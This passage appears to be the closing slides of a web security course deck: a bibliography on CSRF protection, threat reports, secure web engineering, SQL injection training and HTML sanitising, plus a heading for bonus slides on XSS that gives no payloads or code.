Ryck, Philippe De et al. (2011). "Automatic and Precise Client-Side Protection against CSRF Attacks". In: ESORICS. https://lirias.kuleuven.be/bitstream/123456789/311551/1/paper.pdf.
Samuel, Justin. RequestPolicy firefox add-on. https://addons.mozilla.org/en-US/firefox/addon/requestpolicy/.

[85/86] Appendix: For Further Reading

Symantec (2009). Symantec Global Internet Security Threat Report - trends for 2008. http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xiv_04-2009.en-us.pdf.
Wassermann, Gary Michael (2008). Techniques and Tools for Engineering Secure Web Applications. Ph.D. thesis.
Webgoat - numeric SQL injection. http://yehg.net/lab/pr0js/training/view/owasp/webgoat/WebGoat_InjectionFlaws_NumericSQLInject/WebGoat_InjectionFlaws_NumericSQLInject.html.
Wikipedia. Document Object Model. https://secure.wikimedia.org/wikipedia/en/wiki/Document_Object_Model.
Yang, Edward Z. HTMLPurifier. http://htmlpurifier.org/.
[86/86] Bonus slides: XSS

Also see: some tricks to escape browser protections [XSS], [HTML5 security]
